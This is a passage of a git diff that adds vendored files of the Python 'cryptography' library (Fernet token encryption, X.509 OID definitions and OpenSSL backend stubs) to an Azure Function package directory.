int, current_time: int + ) -> bytes: + if ttl is None: + raise ValueError( + "decrypt_at_time() can only be used with a non-None ttl" + ) + timestamp, data = Fernet._get_unverified_token_data(token) + return self._decrypt_data(data, timestamp, (ttl, current_time)) + + def extract_timestamp(self, token: bytes) -> int: + timestamp, data = Fernet._get_unverified_token_data(token) + # Verify the token was not tampered with. 
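+        # (the HMAC in the final 32 bytes covers the version byte, timestamp,
+        # IV and ciphertext)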
+ self._verify_signature(data) + return timestamp + + @staticmethod + def _get_unverified_token_data(token: bytes) -> typing.Tuple[int, bytes]: + utils._check_bytes("token", token) + try: + data = base64.urlsafe_b64decode(token) + except (TypeError, binascii.Error): + raise InvalidToken + + if not data or data[0] != 0x80: + raise InvalidToken + + if len(data) < 9: + raise InvalidToken + + timestamp = int.from_bytes(data[1:9], byteorder="big") + return timestamp, data + + def _verify_signature(self, data: bytes) -> None: + h = HMAC(self._signing_key, hashes.SHA256()) + h.update(data[:-32]) + try: + h.verify(data[-32:]) + except InvalidSignature: + raise InvalidToken + + def _decrypt_data( + self, + data: bytes, + timestamp: int, + time_info: typing.Optional[typing.Tuple[int, int]], + ) -> bytes: + if time_info is not None: + ttl, current_time = time_info + if timestamp + ttl < current_time: + raise InvalidToken + + if current_time + _MAX_CLOCK_SKEW < timestamp: + raise InvalidToken + + self._verify_signature(data) + + iv = data[9:25] + ciphertext = data[25:-32] + decryptor = Cipher( + algorithms.AES(self._encryption_key), modes.CBC(iv) + ).decryptor() + plaintext_padded = decryptor.update(ciphertext) + try: + plaintext_padded += decryptor.finalize() + except ValueError: + raise InvalidToken + unpadder = padding.PKCS7(algorithms.AES.block_size).unpadder() + + unpadded = unpadder.update(plaintext_padded) + try: + unpadded += unpadder.finalize() + except ValueError: + raise InvalidToken + return unpadded + + +class MultiFernet: + def __init__(self, fernets: typing.Iterable[Fernet]): + fernets = list(fernets) + if not fernets: + raise ValueError( + "MultiFernet requires at least one Fernet instance" + ) + self._fernets = fernets + + def encrypt(self, msg: bytes) -> bytes: + return self.encrypt_at_time(msg, int(time.time())) + + def encrypt_at_time(self, msg: bytes, current_time: int) -> bytes: + return self._fernets[0].encrypt_at_time(msg, current_time) + + def rotate(self, msg: bytes) -> bytes: + timestamp, data = Fernet._get_unverified_token_data(msg) + for f in self._fernets: + try: + p = f._decrypt_data(data, timestamp, None) + break + except InvalidToken: + pass + else: + raise InvalidToken + + iv = os.urandom(16) + return self._fernets[0]._encrypt_from_parts(p, timestamp, iv) + + def decrypt(self, msg: bytes, ttl: typing.Optional[int] = None) -> bytes: + for f in self._fernets: + try: + return f.decrypt(msg, ttl) + except InvalidToken: + pass + raise InvalidToken + + def decrypt_at_time( + self, msg: bytes, ttl: int, current_time: int + ) -> bytes: + for f in self._fernets: + try: + return f.decrypt_at_time(msg, ttl, current_time) + except InvalidToken: + pass + raise InvalidToken diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/__init__.py new file mode 100644 index 0000000..b26b769 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/__init__.py @@ -0,0 +1,10 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. +""" +Hazardous Materials + +This is a "Hazardous Materials" module. 
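A short usage sketch of the Fernet and MultiFernet classes implemented above (all public API; only the plaintext and key values here are made up):

from cryptography.fernet import Fernet, MultiFernet

key = Fernet.generate_key()           # 32 random bytes, url-safe base64-encoded
f = Fernet(key)
token = f.encrypt(b"attack at dawn")  # b"\x80" || timestamp || IV || ciphertext || HMAC, base64-encoded
assert f.decrypt(token, ttl=60) == b"attack at dawn"

# MultiFernet decrypts with any listed key but encrypts (and rotates)
# with the first one, which enables gradual key rotation.
mf = MultiFernet([Fernet(Fernet.generate_key()), f])
assert mf.decrypt(mf.rotate(token)) == b"attack at dawn"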
You should ONLY use it if you're +100% absolutely sure that you know what you're doing because this module +is full of land mines, dragons, and dinosaurs with laser guns. +""" diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..8e473b3 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/__pycache__/_oid.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/__pycache__/_oid.cpython-39.pyc new file mode 100644 index 0000000..ae3e45b Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/__pycache__/_oid.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/_oid.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/_oid.py new file mode 100644 index 0000000..a9a853a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/_oid.py @@ -0,0 +1,345 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + +import typing + +from cryptography.hazmat.primitives import hashes + + +class ObjectIdentifier: + def __init__(self, dotted_string: str) -> None: + self._dotted_string = dotted_string + + nodes = self._dotted_string.split(".") + intnodes = [] + + # There must be at least 2 nodes, the first node must be 0..2, and + # if the first node is 0 or 1, the second node must be in the + # range 0..39. All nodes must be non-negative integers.
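# For instance (hypothetical values): "2.5.4.3" passes all of the checks
# below, "3.1" fails (first node outside 0..2), "1.40" fails (first node
# is 1, so the second must be <= 39), and "2" fails (fewer than 2 nodes).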
for node in nodes: + try: + node_value = int(node, 10) + except ValueError: + raise ValueError( + f"Malformed OID: {dotted_string} (non-integer nodes)" + ) + if node_value < 0: + raise ValueError( + f"Malformed OID: {dotted_string} (negative-integer nodes)" + ) + intnodes.append(node_value) + + if len(nodes) < 2: + raise ValueError( + f"Malformed OID: {dotted_string} " + "(insufficient number of nodes)" + ) + + if intnodes[0] > 2: + raise ValueError( + f"Malformed OID: {dotted_string} " + "(first node outside valid range)" + ) + + if intnodes[0] < 2 and intnodes[1] >= 40: + raise ValueError( + f"Malformed OID: {dotted_string} " + "(second node outside valid range)" + ) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, ObjectIdentifier): + return NotImplemented + + return self.dotted_string == other.dotted_string + + def __repr__(self) -> str: + return "<ObjectIdentifier(oid={}, name={})>".format( + self.dotted_string, self._name + ) + + def __hash__(self) -> int: + return hash(self.dotted_string) + + @property + def _name(self) -> str: + return _OID_NAMES.get(self, "Unknown OID") + + @property + def dotted_string(self) -> str: + return self._dotted_string + + +class ExtensionOID: + SUBJECT_DIRECTORY_ATTRIBUTES = ObjectIdentifier("2.5.29.9") + SUBJECT_KEY_IDENTIFIER = ObjectIdentifier("2.5.29.14") + KEY_USAGE = ObjectIdentifier("2.5.29.15") + SUBJECT_ALTERNATIVE_NAME = ObjectIdentifier("2.5.29.17") + ISSUER_ALTERNATIVE_NAME = ObjectIdentifier("2.5.29.18") + BASIC_CONSTRAINTS = ObjectIdentifier("2.5.29.19") + NAME_CONSTRAINTS = ObjectIdentifier("2.5.29.30") + CRL_DISTRIBUTION_POINTS = ObjectIdentifier("2.5.29.31") + CERTIFICATE_POLICIES = ObjectIdentifier("2.5.29.32") + POLICY_MAPPINGS = ObjectIdentifier("2.5.29.33") + AUTHORITY_KEY_IDENTIFIER = ObjectIdentifier("2.5.29.35") + POLICY_CONSTRAINTS = ObjectIdentifier("2.5.29.36") + EXTENDED_KEY_USAGE = ObjectIdentifier("2.5.29.37") + FRESHEST_CRL = ObjectIdentifier("2.5.29.46") + INHIBIT_ANY_POLICY = ObjectIdentifier("2.5.29.54") + ISSUING_DISTRIBUTION_POINT = ObjectIdentifier("2.5.29.28") + AUTHORITY_INFORMATION_ACCESS = ObjectIdentifier("1.3.6.1.5.5.7.1.1") + SUBJECT_INFORMATION_ACCESS = ObjectIdentifier("1.3.6.1.5.5.7.1.11") + OCSP_NO_CHECK = ObjectIdentifier("1.3.6.1.5.5.7.48.1.5") + TLS_FEATURE = ObjectIdentifier("1.3.6.1.5.5.7.1.24") + CRL_NUMBER = ObjectIdentifier("2.5.29.20") + DELTA_CRL_INDICATOR = ObjectIdentifier("2.5.29.27") + PRECERT_SIGNED_CERTIFICATE_TIMESTAMPS = ObjectIdentifier( + "1.3.6.1.4.1.11129.2.4.2" + ) + PRECERT_POISON = ObjectIdentifier("1.3.6.1.4.1.11129.2.4.3") + SIGNED_CERTIFICATE_TIMESTAMPS = ObjectIdentifier("1.3.6.1.4.1.11129.2.4.5") + + +class OCSPExtensionOID: + NONCE = ObjectIdentifier("1.3.6.1.5.5.7.48.1.2") + + +class CRLEntryExtensionOID: + CERTIFICATE_ISSUER = ObjectIdentifier("2.5.29.29") + CRL_REASON = ObjectIdentifier("2.5.29.21") + INVALIDITY_DATE = ObjectIdentifier("2.5.29.24") + + +class NameOID: + COMMON_NAME = ObjectIdentifier("2.5.4.3") + COUNTRY_NAME = ObjectIdentifier("2.5.4.6") + LOCALITY_NAME = ObjectIdentifier("2.5.4.7") + STATE_OR_PROVINCE_NAME = ObjectIdentifier("2.5.4.8") + STREET_ADDRESS = ObjectIdentifier("2.5.4.9") + ORGANIZATION_NAME = ObjectIdentifier("2.5.4.10") + ORGANIZATIONAL_UNIT_NAME = ObjectIdentifier("2.5.4.11") + SERIAL_NUMBER = ObjectIdentifier("2.5.4.5") + SURNAME = ObjectIdentifier("2.5.4.4") + GIVEN_NAME = ObjectIdentifier("2.5.4.42") + TITLE = ObjectIdentifier("2.5.4.12") + GENERATION_QUALIFIER = ObjectIdentifier("2.5.4.44") + X500_UNIQUE_IDENTIFIER = ObjectIdentifier("2.5.4.45") +
DN_QUALIFIER = ObjectIdentifier("2.5.4.46") + PSEUDONYM = ObjectIdentifier("2.5.4.65") + USER_ID = ObjectIdentifier("0.9.2342.19200300.100.1.1") + DOMAIN_COMPONENT = ObjectIdentifier("0.9.2342.19200300.100.1.25") + EMAIL_ADDRESS = ObjectIdentifier("1.2.840.113549.1.9.1") + JURISDICTION_COUNTRY_NAME = ObjectIdentifier("1.3.6.1.4.1.311.60.2.1.3") + JURISDICTION_LOCALITY_NAME = ObjectIdentifier("1.3.6.1.4.1.311.60.2.1.1") + JURISDICTION_STATE_OR_PROVINCE_NAME = ObjectIdentifier( + "1.3.6.1.4.1.311.60.2.1.2" + ) + BUSINESS_CATEGORY = ObjectIdentifier("2.5.4.15") + POSTAL_ADDRESS = ObjectIdentifier("2.5.4.16") + POSTAL_CODE = ObjectIdentifier("2.5.4.17") + INN = ObjectIdentifier("1.2.643.3.131.1.1") + OGRN = ObjectIdentifier("1.2.643.100.1") + SNILS = ObjectIdentifier("1.2.643.100.3") + UNSTRUCTURED_NAME = ObjectIdentifier("1.2.840.113549.1.9.2") + + +class SignatureAlgorithmOID: + RSA_WITH_MD5 = ObjectIdentifier("1.2.840.113549.1.1.4") + RSA_WITH_SHA1 = ObjectIdentifier("1.2.840.113549.1.1.5") + # This is an alternate OID for RSA with SHA1 that is occasionally seen + _RSA_WITH_SHA1 = ObjectIdentifier("1.3.14.3.2.29") + RSA_WITH_SHA224 = ObjectIdentifier("1.2.840.113549.1.1.14") + RSA_WITH_SHA256 = ObjectIdentifier("1.2.840.113549.1.1.11") + RSA_WITH_SHA384 = ObjectIdentifier("1.2.840.113549.1.1.12") + RSA_WITH_SHA512 = ObjectIdentifier("1.2.840.113549.1.1.13") + RSA_WITH_SHA3_224 = ObjectIdentifier("2.16.840.1.101.3.4.3.13") + RSA_WITH_SHA3_256 = ObjectIdentifier("2.16.840.1.101.3.4.3.14") + RSA_WITH_SHA3_384 = ObjectIdentifier("2.16.840.1.101.3.4.3.15") + RSA_WITH_SHA3_512 = ObjectIdentifier("2.16.840.1.101.3.4.3.16") + RSASSA_PSS = ObjectIdentifier("1.2.840.113549.1.1.10") + ECDSA_WITH_SHA1 = ObjectIdentifier("1.2.840.10045.4.1") + ECDSA_WITH_SHA224 = ObjectIdentifier("1.2.840.10045.4.3.1") + ECDSA_WITH_SHA256 = ObjectIdentifier("1.2.840.10045.4.3.2") + ECDSA_WITH_SHA384 = ObjectIdentifier("1.2.840.10045.4.3.3") + ECDSA_WITH_SHA512 = ObjectIdentifier("1.2.840.10045.4.3.4") + ECDSA_WITH_SHA3_224 = ObjectIdentifier("2.16.840.1.101.3.4.3.9") + ECDSA_WITH_SHA3_256 = ObjectIdentifier("2.16.840.1.101.3.4.3.10") + ECDSA_WITH_SHA3_384 = ObjectIdentifier("2.16.840.1.101.3.4.3.11") + ECDSA_WITH_SHA3_512 = ObjectIdentifier("2.16.840.1.101.3.4.3.12") + DSA_WITH_SHA1 = ObjectIdentifier("1.2.840.10040.4.3") + DSA_WITH_SHA224 = ObjectIdentifier("2.16.840.1.101.3.4.3.1") + DSA_WITH_SHA256 = ObjectIdentifier("2.16.840.1.101.3.4.3.2") + DSA_WITH_SHA384 = ObjectIdentifier("2.16.840.1.101.3.4.3.3") + DSA_WITH_SHA512 = ObjectIdentifier("2.16.840.1.101.3.4.3.4") + ED25519 = ObjectIdentifier("1.3.101.112") + ED448 = ObjectIdentifier("1.3.101.113") + GOSTR3411_94_WITH_3410_2001 = ObjectIdentifier("1.2.643.2.2.3") + GOSTR3410_2012_WITH_3411_2012_256 = ObjectIdentifier("1.2.643.7.1.1.3.2") + GOSTR3410_2012_WITH_3411_2012_512 = ObjectIdentifier("1.2.643.7.1.1.3.3") + + +_SIG_OIDS_TO_HASH: typing.Dict[ + ObjectIdentifier, typing.Optional[hashes.HashAlgorithm] +] = { + SignatureAlgorithmOID.RSA_WITH_MD5: hashes.MD5(), + SignatureAlgorithmOID.RSA_WITH_SHA1: hashes.SHA1(), + SignatureAlgorithmOID._RSA_WITH_SHA1: hashes.SHA1(), + SignatureAlgorithmOID.RSA_WITH_SHA224: hashes.SHA224(), + SignatureAlgorithmOID.RSA_WITH_SHA256: hashes.SHA256(), + SignatureAlgorithmOID.RSA_WITH_SHA384: hashes.SHA384(), + SignatureAlgorithmOID.RSA_WITH_SHA512: hashes.SHA512(), + SignatureAlgorithmOID.ECDSA_WITH_SHA1: hashes.SHA1(), + SignatureAlgorithmOID.ECDSA_WITH_SHA224: hashes.SHA224(), + SignatureAlgorithmOID.ECDSA_WITH_SHA256: 
hashes.SHA256(), + SignatureAlgorithmOID.ECDSA_WITH_SHA384: hashes.SHA384(), + SignatureAlgorithmOID.ECDSA_WITH_SHA512: hashes.SHA512(), + SignatureAlgorithmOID.DSA_WITH_SHA1: hashes.SHA1(), + SignatureAlgorithmOID.DSA_WITH_SHA224: hashes.SHA224(), + SignatureAlgorithmOID.DSA_WITH_SHA256: hashes.SHA256(), + SignatureAlgorithmOID.ED25519: None, + SignatureAlgorithmOID.ED448: None, + SignatureAlgorithmOID.GOSTR3411_94_WITH_3410_2001: None, + SignatureAlgorithmOID.GOSTR3410_2012_WITH_3411_2012_256: None, + SignatureAlgorithmOID.GOSTR3410_2012_WITH_3411_2012_512: None, +} + + +class ExtendedKeyUsageOID: + SERVER_AUTH = ObjectIdentifier("1.3.6.1.5.5.7.3.1") + CLIENT_AUTH = ObjectIdentifier("1.3.6.1.5.5.7.3.2") + CODE_SIGNING = ObjectIdentifier("1.3.6.1.5.5.7.3.3") + EMAIL_PROTECTION = ObjectIdentifier("1.3.6.1.5.5.7.3.4") + TIME_STAMPING = ObjectIdentifier("1.3.6.1.5.5.7.3.8") + OCSP_SIGNING = ObjectIdentifier("1.3.6.1.5.5.7.3.9") + ANY_EXTENDED_KEY_USAGE = ObjectIdentifier("2.5.29.37.0") + SMARTCARD_LOGON = ObjectIdentifier("1.3.6.1.4.1.311.20.2.2") + KERBEROS_PKINIT_KDC = ObjectIdentifier("1.3.6.1.5.2.3.5") + IPSEC_IKE = ObjectIdentifier("1.3.6.1.5.5.7.3.17") + + +class AuthorityInformationAccessOID: + CA_ISSUERS = ObjectIdentifier("1.3.6.1.5.5.7.48.2") + OCSP = ObjectIdentifier("1.3.6.1.5.5.7.48.1") + + +class SubjectInformationAccessOID: + CA_REPOSITORY = ObjectIdentifier("1.3.6.1.5.5.7.48.5") + + +class CertificatePoliciesOID: + CPS_QUALIFIER = ObjectIdentifier("1.3.6.1.5.5.7.2.1") + CPS_USER_NOTICE = ObjectIdentifier("1.3.6.1.5.5.7.2.2") + ANY_POLICY = ObjectIdentifier("2.5.29.32.0") + + +class AttributeOID: + CHALLENGE_PASSWORD = ObjectIdentifier("1.2.840.113549.1.9.7") + UNSTRUCTURED_NAME = ObjectIdentifier("1.2.840.113549.1.9.2") + + +_OID_NAMES = { + NameOID.COMMON_NAME: "commonName", + NameOID.COUNTRY_NAME: "countryName", + NameOID.LOCALITY_NAME: "localityName", + NameOID.STATE_OR_PROVINCE_NAME: "stateOrProvinceName", + NameOID.STREET_ADDRESS: "streetAddress", + NameOID.ORGANIZATION_NAME: "organizationName", + NameOID.ORGANIZATIONAL_UNIT_NAME: "organizationalUnitName", + NameOID.SERIAL_NUMBER: "serialNumber", + NameOID.SURNAME: "surname", + NameOID.GIVEN_NAME: "givenName", + NameOID.TITLE: "title", + NameOID.GENERATION_QUALIFIER: "generationQualifier", + NameOID.X500_UNIQUE_IDENTIFIER: "x500UniqueIdentifier", + NameOID.DN_QUALIFIER: "dnQualifier", + NameOID.PSEUDONYM: "pseudonym", + NameOID.USER_ID: "userID", + NameOID.DOMAIN_COMPONENT: "domainComponent", + NameOID.EMAIL_ADDRESS: "emailAddress", + NameOID.JURISDICTION_COUNTRY_NAME: "jurisdictionCountryName", + NameOID.JURISDICTION_LOCALITY_NAME: "jurisdictionLocalityName", + NameOID.JURISDICTION_STATE_OR_PROVINCE_NAME: ( + "jurisdictionStateOrProvinceName" + ), + NameOID.BUSINESS_CATEGORY: "businessCategory", + NameOID.POSTAL_ADDRESS: "postalAddress", + NameOID.POSTAL_CODE: "postalCode", + NameOID.INN: "INN", + NameOID.OGRN: "OGRN", + NameOID.SNILS: "SNILS", + NameOID.UNSTRUCTURED_NAME: "unstructuredName", + SignatureAlgorithmOID.RSA_WITH_MD5: "md5WithRSAEncryption", + SignatureAlgorithmOID.RSA_WITH_SHA1: "sha1WithRSAEncryption", + SignatureAlgorithmOID.RSA_WITH_SHA224: "sha224WithRSAEncryption", + SignatureAlgorithmOID.RSA_WITH_SHA256: "sha256WithRSAEncryption", + SignatureAlgorithmOID.RSA_WITH_SHA384: "sha384WithRSAEncryption", + SignatureAlgorithmOID.RSA_WITH_SHA512: "sha512WithRSAEncryption", + SignatureAlgorithmOID.RSASSA_PSS: "RSASSA-PSS", + SignatureAlgorithmOID.ECDSA_WITH_SHA1: "ecdsa-with-SHA1", + 
SignatureAlgorithmOID.ECDSA_WITH_SHA224: "ecdsa-with-SHA224", + SignatureAlgorithmOID.ECDSA_WITH_SHA256: "ecdsa-with-SHA256", + SignatureAlgorithmOID.ECDSA_WITH_SHA384: "ecdsa-with-SHA384", + SignatureAlgorithmOID.ECDSA_WITH_SHA512: "ecdsa-with-SHA512", + SignatureAlgorithmOID.DSA_WITH_SHA1: "dsa-with-sha1", + SignatureAlgorithmOID.DSA_WITH_SHA224: "dsa-with-sha224", + SignatureAlgorithmOID.DSA_WITH_SHA256: "dsa-with-sha256", + SignatureAlgorithmOID.ED25519: "ed25519", + SignatureAlgorithmOID.ED448: "ed448", + SignatureAlgorithmOID.GOSTR3411_94_WITH_3410_2001: ( + "GOST R 34.11-94 with GOST R 34.10-2001" + ), + SignatureAlgorithmOID.GOSTR3410_2012_WITH_3411_2012_256: ( + "GOST R 34.10-2012 with GOST R 34.11-2012 (256 bit)" + ), + SignatureAlgorithmOID.GOSTR3410_2012_WITH_3411_2012_512: ( + "GOST R 34.10-2012 with GOST R 34.11-2012 (512 bit)" + ), + ExtendedKeyUsageOID.SERVER_AUTH: "serverAuth", + ExtendedKeyUsageOID.CLIENT_AUTH: "clientAuth", + ExtendedKeyUsageOID.CODE_SIGNING: "codeSigning", + ExtendedKeyUsageOID.EMAIL_PROTECTION: "emailProtection", + ExtendedKeyUsageOID.TIME_STAMPING: "timeStamping", + ExtendedKeyUsageOID.OCSP_SIGNING: "OCSPSigning", + ExtendedKeyUsageOID.SMARTCARD_LOGON: "msSmartcardLogin", + ExtendedKeyUsageOID.KERBEROS_PKINIT_KDC: "pkInitKDC", + ExtensionOID.SUBJECT_DIRECTORY_ATTRIBUTES: "subjectDirectoryAttributes", + ExtensionOID.SUBJECT_KEY_IDENTIFIER: "subjectKeyIdentifier", + ExtensionOID.KEY_USAGE: "keyUsage", + ExtensionOID.SUBJECT_ALTERNATIVE_NAME: "subjectAltName", + ExtensionOID.ISSUER_ALTERNATIVE_NAME: "issuerAltName", + ExtensionOID.BASIC_CONSTRAINTS: "basicConstraints", + ExtensionOID.PRECERT_SIGNED_CERTIFICATE_TIMESTAMPS: ( + "signedCertificateTimestampList" + ), + ExtensionOID.SIGNED_CERTIFICATE_TIMESTAMPS: ( + "signedCertificateTimestampList" + ), + ExtensionOID.PRECERT_POISON: "ctPoison", + CRLEntryExtensionOID.CRL_REASON: "cRLReason", + CRLEntryExtensionOID.INVALIDITY_DATE: "invalidityDate", + CRLEntryExtensionOID.CERTIFICATE_ISSUER: "certificateIssuer", + ExtensionOID.NAME_CONSTRAINTS: "nameConstraints", + ExtensionOID.CRL_DISTRIBUTION_POINTS: "cRLDistributionPoints", + ExtensionOID.CERTIFICATE_POLICIES: "certificatePolicies", + ExtensionOID.POLICY_MAPPINGS: "policyMappings", + ExtensionOID.AUTHORITY_KEY_IDENTIFIER: "authorityKeyIdentifier", + ExtensionOID.POLICY_CONSTRAINTS: "policyConstraints", + ExtensionOID.EXTENDED_KEY_USAGE: "extendedKeyUsage", + ExtensionOID.FRESHEST_CRL: "freshestCRL", + ExtensionOID.INHIBIT_ANY_POLICY: "inhibitAnyPolicy", + ExtensionOID.ISSUING_DISTRIBUTION_POINT: ("issuingDistributionPoint"), + ExtensionOID.AUTHORITY_INFORMATION_ACCESS: "authorityInfoAccess", + ExtensionOID.SUBJECT_INFORMATION_ACCESS: "subjectInfoAccess", + ExtensionOID.OCSP_NO_CHECK: "OCSPNoCheck", + ExtensionOID.CRL_NUMBER: "cRLNumber", + ExtensionOID.DELTA_CRL_INDICATOR: "deltaCRLIndicator", + ExtensionOID.TLS_FEATURE: "TLSFeature", + AuthorityInformationAccessOID.OCSP: "OCSP", + AuthorityInformationAccessOID.CA_ISSUERS: "caIssuers", + SubjectInformationAccessOID.CA_REPOSITORY: "caRepository", + CertificatePoliciesOID.CPS_QUALIFIER: "id-qt-cps", + CertificatePoliciesOID.CPS_USER_NOTICE: "id-qt-unotice", + OCSPExtensionOID.NONCE: "OCSPNonce", + AttributeOID.CHALLENGE_PASSWORD: "challengePassword", +} diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/__init__.py 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/__init__.py new file mode 100644 index 0000000..f25cdb5 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/__init__.py @@ -0,0 +1,10 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. +from typing import Any + + +def default_backend() -> Any: + from cryptography.hazmat.backends.openssl.backend import backend + + return backend diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..56a3518 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__init__.py new file mode 100644 index 0000000..498900e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__init__.py @@ -0,0 +1,9 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. 
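default_backend(), defined above, lazily imports and returns the OpenSSL backend singleton. A usage sketch (current releases accept an explicit backend argument but ignore it, so passing it is optional):

from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes

digest = hashes.Hash(hashes.SHA256(), backend=default_backend())
digest.update(b"data")
print(digest.finalize().hex())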
+ + +from cryptography.hazmat.backends.openssl.backend import backend + + +__all__ = ["backend"] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..7e3ef81 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/aead.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/aead.cpython-39.pyc new file mode 100644 index 0000000..77fbc89 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/aead.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/backend.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/backend.cpython-39.pyc new file mode 100644 index 0000000..fce2416 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/backend.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/ciphers.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/ciphers.cpython-39.pyc new file mode 100644 index 0000000..fb9e606 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/ciphers.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/cmac.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/cmac.cpython-39.pyc new file mode 100644 index 0000000..f0c35f2 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/cmac.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/decode_asn1.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/decode_asn1.cpython-39.pyc new file mode 100644 index 0000000..51ad617 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/decode_asn1.cpython-39.pyc differ diff --git 
a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/dh.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/dh.cpython-39.pyc new file mode 100644 index 0000000..616904f Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/dh.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/dsa.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/dsa.cpython-39.pyc new file mode 100644 index 0000000..a17c05c Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/dsa.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/ec.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/ec.cpython-39.pyc new file mode 100644 index 0000000..50d629a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/__pycache__/ec.cpython-39.pyc differ diff --git 